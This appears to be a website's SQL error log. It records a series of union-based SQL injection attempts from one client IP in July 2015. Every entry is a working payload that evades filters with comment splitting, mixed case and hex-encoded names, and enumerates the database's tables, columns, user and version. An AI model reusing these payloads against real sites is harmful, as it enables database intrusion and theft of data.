SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x636173657374797065),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:54

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x636173657374797065),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:56

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x636173657374797065),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:10:56

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/cOnCaT(/**/uSeR(),0x332150,/**/vErSiOn(),0x332150,/**/dAtAbAsE()),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:22

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,/**/cOnCaT(0x217e21,/**/cOnCaT(/**/uSeR(),0x332150,/**/vErSiOn(),0x332150,/**/dAtAbAsE()),0x217e21),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:22

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:25

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:25

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/tAbLe_nAmE),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:28

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/tAbLe_nAmE),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:28

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e65777374797065),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:36

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e65777374797065),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:36

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e65777374797065),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:37

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e65777374797065),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:37

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e657773),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:40

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e657773),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:40

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e657773),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:41

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6e657773),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:41

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x636173657374797065),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:46

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x636173657374797065),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:46

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x636173657374797065),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:48

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x636173657374797065),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:48

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6361736573),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:51

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6361736573),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:51

错误SQL语句：
SELECT nid FROM news  Where nid<'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6361736573),3,4,5,6,7,8 and '0'='0' order by nid desc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:52

错误SQL语句：
SELECT nid FROM news  Where nid>'47999999.9' /**/uNiOn/**/aLl /**/sElEcT 1,(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/cOlUmN_NaMe),0x217e21) /**/fRoM information_schema./**/cOlUmNs /**/wHeRe /**/tAbLe_sChEmA=0x68756973656e and /**/tAbLe_nAmE=0x6361736573),3,4,5,6,7,8 and '0'='0' order by nid asc limit 1
客户IP:188.64.175.211
时间 :2015-07-02 04:15:52

